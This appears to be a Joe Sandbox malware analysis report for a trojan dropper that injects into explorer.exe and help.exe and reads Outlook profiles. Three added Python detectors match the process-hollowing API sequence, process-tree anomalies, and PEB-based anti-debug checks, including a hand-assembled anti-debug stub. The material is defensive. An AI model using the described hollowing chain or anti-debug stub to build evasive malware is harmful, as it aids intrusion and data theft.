Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB0D20 3_2_00AB0D20
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82D07 3_2_00B82D07
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81D55 3_2_00B81D55
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B82EF7 3_2_00B82EF7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD6E30 3_2_00AD6E30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7D616 3_2_00B7D616
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81FF1 3_2_00B81FF1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8DFCE 3_2_00B8DFCE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: String function: 00ABB150 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E087 NtAllocateVirtualMemory, 3_2_0041E087
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory, 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DEA7 NtCreateFile, 3_2_0041DEA7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DF57 NtReadFile, 3_2_0041DF57
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DFD7 NtClose, 3_2_0041DFD7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E081 NtAllocateVirtualMemory, 3_2_0041E081
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004012A4 EntryPoint,NtProtectVirtualMemory, 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004014E9 NtProtectVirtualMemory, 3_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DF52 NtReadFile, 3_2_0041DF52
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041DFD2 NtClose, 3_2_0041DFD2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00AF98F0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00AF9860
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk, 3_2_00AF9840
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk, 3_2_00AF99A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00AF9910
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk, 3_2_00AF9A20
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00AF9A00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk, 3_2_00AF9A50
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF95D0 NtClose,LdrInitializeThunk, 3_2_00AF95D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk, 3_2_00AF9540
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00AF96E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00AF9660
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00AF97A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00AF9780
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00AF9FE0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00AF9710
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF98A0 NtWriteVirtualMemory, 3_2_00AF98A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9820 NtEnumerateKey, 3_2_00AF9820
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFB040 NtSuspendThread, 3_2_00AFB040
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF99D0 NtCreateProcessEx, 3_2_00AF99D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9950 NtQueueApcThread, 3_2_00AF9950
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A80 NtOpenDirectoryObject, 3_2_00AF9A80
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9A10 NtQuerySection, 3_2_00AF9A10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA3B0 NtGetContextThread, 3_2_00AFA3B0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9B00 NtSetValueKey, 3_2_00AF9B00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF95F0 NtQueryInformationFile, 3_2_00AF95F0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9520 NtWaitForSingleObject, 3_2_00AF9520
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFAD30 NtSetContextThread, 3_2_00AFAD30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9560 NtWriteFile, 3_2_00AF9560
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF96D0 NtCreateKey, 3_2_00AF96D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9610 NtEnumerateValueKey, 3_2_00AF9610
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9670 NtQueryInformationProcess, 3_2_00AF9670
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9650 NtQueryValueKey, 3_2_00AF9650
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9730 NtQueryVirtualMemory, 3_2_00AF9730
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA710 NtOpenProcessToken, 3_2_00AFA710
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9760 NtOpenProcess, 3_2_00AF9760
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF9770 NtSetInformationFile, 3_2_00AF9770
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AFA770 NtOpenThread, 3_2_00AFA770
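The NT API set listed above for hvbvmxm.exe (NtCreateProcessEx, NtOpenProcess, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtGetContextThread/NtSetContextThread, NtQueueApcThread, NtResumeThread) is the raw material behind the "process hollowing" and "thread injection" signatures in the summary. What makes it hollowing is the order in which those calls occur, not the presence of any one of them; a debugger uses several of the same APIs. The following Python is an added example, not part of the Joe Sandbox report, that matches the ordered chain against a per-process API trace. SAMPLE_TRACE and BENIGN_TRACE are constructed from the API names above and are not traces exported by the sandbox.

```python
"""Ordered matching of the process-hollowing / thread-hijack API chain.

Added example; it is not part of the Joe Sandbox report. SAMPLE_TRACE is
constructed from the NT API names the report attributes to hvbvmxm.exe and
ordered the way a hollowing loader calls them; it is not a call trace
exported by the sandbox. BENIGN_TRACE is a constructed debugger-like
sequence used as a negative case.
"""
from typing import Iterable, List, Optional, Sequence, Tuple

# Each step lists the APIs that satisfy it. The order is the point: a loader
# must obtain a target, replace or extend its memory, write the payload,
# redirect execution, and only then let the thread run.
HOLLOWING_CHAIN: Sequence[Tuple[str, ...]] = (
    ("NtCreateProcessEx", "NtCreateUserProcess", "NtOpenProcess"),
    ("NtUnmapViewOfSection", "NtAllocateVirtualMemory", "NtMapViewOfSection"),
    ("NtWriteVirtualMemory", "NtMapViewOfSection"),
    ("NtSetContextThread", "NtQueueApcThread"),
    ("NtResumeThread",),
)

Hit = Tuple[int, int, str]  # (chain step, index into the trace, API name)


def match_chain(calls: Iterable[str],
                chain: Sequence[Tuple[str, ...]] = HOLLOWING_CHAIN) -> Optional[List[Hit]]:
    """Return the hits that complete `chain` as an ordered subsequence of
    `calls`, or None if some step never occurs after its predecessor.

    Calls between steps are ignored, so a loader that writes the payload in
    several NtWriteVirtualMemory calls still matches; a NtResumeThread that
    precedes NtSetContextThread does not complete the chain.
    """
    hits: List[Hit] = []
    step = 0
    for index, api in enumerate(calls):
        if step < len(chain) and api in chain[step]:
            hits.append((step, index, api))
            step += 1
    return hits if step == len(chain) else None


def describe(hits: Optional[List[Hit]]) -> str:
    """One-line summary for a triage note."""
    if hits is None:
        return "no hollowing chain"
    return "hollowing chain: " + " -> ".join(api for _, _, api in hits)


SAMPLE_TRACE = [                 # constructed; order is the classic hollowing order
    "NtAdjustPrivilegesToken",   # SeDebugPrivilege ('Process token adjusted: Debug')
    "NtCreateProcessEx",         # target created suspended
    "NtGetContextThread",        # read the initial thread context
    "NtUnmapViewOfSection",      # hollow out the original image
    "NtAllocateVirtualMemory",   # reserve the region for the new image
    "NtWriteVirtualMemory",      # headers
    "NtWriteVirtualMemory",      # sections
    "NtSetContextThread",        # point the thread at the new entry point
    "NtResumeThread",
]

BENIGN_TRACE = [                 # constructed; what a debugger attach looks like
    "NtOpenProcess", "NtReadVirtualMemory", "NtSuspendThread",
    "NtGetContextThread", "NtResumeThread", "NtClose",
]

if __name__ == "__main__":
    print(describe(match_chain(SAMPLE_TRACE)))
    print(describe(match_chain(BENIGN_TRACE)))
```

Run against a real trace, feed the per-process API calls in capture order; the step alternatives cover both hollowing a freshly created process and injecting into an existing one (NtOpenProcess, as the report also lists), with either a context rewrite or a queued APC as the execution hijack.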
Source: Lc8xQv8iZY.exe ReversingLabs: Detection: 48%
Source: Lc8xQv8iZY.exe Virustotal: Detection: 47%
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\user\Desktop\Lc8xQv8iZY.exe Jump to behavior
Source: Lc8xQv8iZY.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
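The process tree above carries three relationships worth turning into rules: the dropper on the Desktop launching hvbvmxm.exe from %TEMP%, hvbvmxm.exe re-executing itself with the same .h argument, and explorer.exe, which is not a child of the sample, spawning C:\Windows\SysWOW64\help.exe with a bare command line, consistent with the injection signatures in the summary. The Python below is an added example, not part of the Joe Sandbox report: it parses these "Process created" lines, drops the duplicates the report prints once per signature, and applies those three heuristics. REPORT_LINES copies the seven lines above; the rule names and the choice of conhost.exe as noise are this example's own.

```python
"""Parent/child heuristics over the 'Process created' lines of the report.

Added example; not part of the Joe Sandbox report. REPORT_LINES copies the
seven process-creation lines printed in the report; the rule names and the
ignore list are this example's own choices, not sandbox signatures.
"""
import re
from typing import Dict, List, NamedTuple, Tuple

LINE_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<image>\S+)"
    r"(?:\s+(?P<cmd>.*?))?(?:\s+Jump to behavior)?$"
)
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
SYSTEM_DIR = re.compile(r"^C:\\Windows\\(System32|SysWOW64)\\", re.I)
# A console host is spawned for every console process and carries no signal.
IGNORED_CHILDREN = {"conhost.exe"}


class Event(NamedTuple):
    parent: str
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse(lines) -> List[Event]:
    """Parse the lines, keeping the first copy of each distinct event."""
    seen: Dict[Event, None] = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        seen.setdefault(Event(m["parent"], m["image"], m["cmd"] or ""), None)
    return list(seen)


def classify(ev: Event) -> List[str]:
    findings: List[str] = []
    child = basename(ev.image)
    if child in IGNORED_CHILDREN:
        return findings
    # explorer.exe launching a System32/SysWOW64 utility with no arguments, as
    # explorer.exe -> help.exe here. Interactive launches can produce this too,
    # so it is a signal to combine with others, not a verdict on its own.
    if (basename(ev.parent) == "explorer.exe" and SYSTEM_DIR.match(ev.image)
            and ev.cmdline.strip('"') == ev.image):
        findings.append("explorer-spawns-bare-system-binary")
    # A binary in a user-writable directory re-executing itself: the usual
    # unpack-then-hand-off behaviour of a dropper stage.
    if USER_WRITABLE.match(ev.parent) and basename(ev.parent) == child:
        findings.append("self-reexecution-from-user-dir")
    if USER_WRITABLE.match(ev.image) and "\\temp\\" in ev.image.lower():
        findings.append("image-launched-from-temp")
    return findings


def triage(lines) -> List[Tuple[str, str, str]]:
    """Return (rule, parent basename, child basename) for every finding."""
    out: List[Tuple[str, str, str]] = []
    for ev in parse(lines):
        for rule in classify(ev):
            out.append((rule, basename(ev.parent), basename(ev.image)))
    return out


# Copied from the report's process-creation lines (including the two repeats).
REPORT_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\Lc8xQv8iZY.exe C:\Users\user\Desktop\Lc8xQv8iZY.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h Jump to behavior
""".strip().splitlines()

if __name__ == "__main__":
    for finding in triage(REPORT_LINES):
        print(finding)
```

The same three rules map directly onto Sysmon Event ID 1 fields (ParentImage, Image, CommandLine) if you want them as live detections rather than report post-processing.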
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\nsaAF5E.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@9/7
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Command line argument: ^oA 1_2_00416EB0
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040CC02 push cs; retf 0040h 1_2_0040CC21
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AC96 push ecx; ret 1_2_0040ACA9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004210E9 push eax; ret 3_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_004210F2 push eax; ret 3_2_00421159
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0042109C push eax; ret 3_2_004210EF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00421153 push eax; ret 3_2_00421159
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040EAA3 push ecx; retf 3_2_0040EAA6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041E5D0 push ecx; iretd 3_2_0041E5D2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00419F38 push edx; ret 3_2_00419F39
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0041FF93 push ebx; retf 3_2_0041FF94
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B0D0D1 push ecx; ret 3_2_00B0D0E4
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe File created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Jump to dropped file
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
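The "GetPEB" step of this chain is what the many `mov eax, dword ptr fs:[00000030h]` entries for hvbvmxm.exe later in the report show: the loader reads the PEB pointer out of the 32-bit TEB and then tests a field such as BeingDebugged or NumberOfProcessors before deciding whether to continue or call ExitProcess. The scanner below is an added example, not part of the Joe Sandbox report. It finds those loads in a raw 32-bit code dump and names the PEB field the next instruction touches. SAMPLE is a hand-assembled stub constructed for the example, not bytes from hvbvmxm.exe, and the field lookup is a bounded byte-pattern heuristic rather than a disassembler.

```python
"""Locate 32-bit PEB reads (mov r32, fs:[30h]) in a code dump and name the
PEB field the following instruction touches.

Added example, not part of the Joe Sandbox report. SAMPLE is a constructed
anti-analysis stub (hand-assembled bytes), not code from hvbvmxm.exe. The
lookup after a load is a byte-pattern heuristic with a bounded window, not
a disassembler, so it can miss other instruction forms or misfire on data
that happens to look like code.
"""
import re
from typing import Dict, List, Optional, Tuple

# fs:[30h] is the PEB pointer in the 32-bit TEB. pattern -> (register, ModRM rm index)
PEB_LOAD: Dict[bytes, Tuple[str, int]] = {
    b"\x64\xa1\x30\x00\x00\x00": ("eax", 0),       # mov eax, fs:[30h] (moffs form)
    b"\x64\x8b\x05\x30\x00\x00\x00": ("eax", 0),   # mov eax, fs:[30h] (ModRM form)
    b"\x64\x8b\x0d\x30\x00\x00\x00": ("ecx", 1),   # mov ecx, fs:[30h]
    b"\x64\x8b\x15\x30\x00\x00\x00": ("edx", 2),   # mov edx, fs:[30h]
    b"\x64\x8b\x1d\x30\x00\x00\x00": ("ebx", 3),   # mov ebx, fs:[30h]
}

# 32-bit PEB offsets an evasive loader typically reads.
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x64: "NumberOfProcessors",
    0x68: "NtGlobalFlag",
}

# Opcodes followed by a ModRM byte; a [reg+disp8] operand is mod=01, rm=reg.
ONE_BYTE_OPS = {0x8B: "mov", 0x8A: "mov", 0x80: "grp1-imm8", 0x83: "grp1-imm8",
                0xF6: "test", 0x38: "cmp", 0x39: "cmp", 0x3B: "cmp", 0x8D: "lea"}
TWO_BYTE_OPS = {0xB6: "movzx", 0xB7: "movzx"}   # after the 0x0F escape byte


def _field_after(code: bytes, start: int, reg_idx: int,
                 window: int) -> Optional[Tuple[int, str, int]]:
    """Scan `window` bytes after a PEB load for a [reg+disp8] access.
    Returns (offset, mnemonic, disp8) of the first one found. Advances one
    byte at a time, so it does not need instruction lengths."""
    end = min(len(code), start + window)
    i = start
    while i < end:
        op = code[i]
        if op == 0x0F and i + 3 < len(code) and code[i + 1] in TWO_BYTE_OPS:
            modrm, disp, mnem = code[i + 2], code[i + 3], TWO_BYTE_OPS[code[i + 1]]
        elif op in ONE_BYTE_OPS and i + 2 < len(code):
            modrm, disp, mnem = code[i + 1], code[i + 2], ONE_BYTE_OPS[op]
        else:
            i += 1
            continue
        if (modrm & 0xC0) == 0x40 and (modrm & 0x07) == reg_idx:
            return i, mnem, disp
        i += 1
    return None


def find_peb_accesses(code: bytes, window: int = 24) -> List[dict]:
    """Return one record per PEB load, with the field read afterwards if any."""
    hits: List[dict] = []
    for pattern, (reg, reg_idx) in PEB_LOAD.items():
        for m in re.finditer(re.escape(pattern), code):
            hit = {"offset": m.start(), "reg": reg, "field": None,
                   "field_offset": None, "access": None}
            found = _field_after(code, m.end(), reg_idx, window)
            if found:
                at, mnem, disp = found
                hit.update(field=PEB_FIELDS.get(disp, "PEB+0x%02x" % disp),
                           field_offset=disp, access=mnem, access_offset=at)
            hits.append(hit)
    return sorted(hits, key=lambda h: h["offset"])


# Constructed stub: debugger check, then a CPU-count check, then a TEB read
# that must NOT be reported because fs:[18h] is the TEB self pointer.
SAMPLE = bytes.fromhex(
    "64a130000000"      # 00: mov eax, fs:[30h]
    "0fb64002"          # 06: movzx eax, byte ptr [eax+2]    ; BeingDebugged
    "85c0"              # 10: test eax, eax
    "7518"              # 12: jnz exit
    "648b0d30000000"    # 14: mov ecx, fs:[30h]
    "83796402"          # 21: cmp dword ptr [ecx+64h], 2     ; NumberOfProcessors
    "7c12"              # 25: jl exit
    "64a118000000"      # 27: mov eax, fs:[18h]              ; TEB, not PEB
    "c3"                # 33: ret
)

if __name__ == "__main__":
    for hit in find_peb_accesses(SAMPLE):
        print(hit)
```

Point it at the unpacked .text of the stage that shows the fs:[30h] reads; a count of PEB loads paired with BeingDebugged, NtGlobalFlag or NumberOfProcessors reads is a usable static indicator of the evasion the sandbox observed dynamically.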
Source: C:\Windows\explorer.exe TID: 5288 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 4464 Thread sleep time: -42000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 6.8 %
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00410370 FindFirstFileExW, 1_2_00410370
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
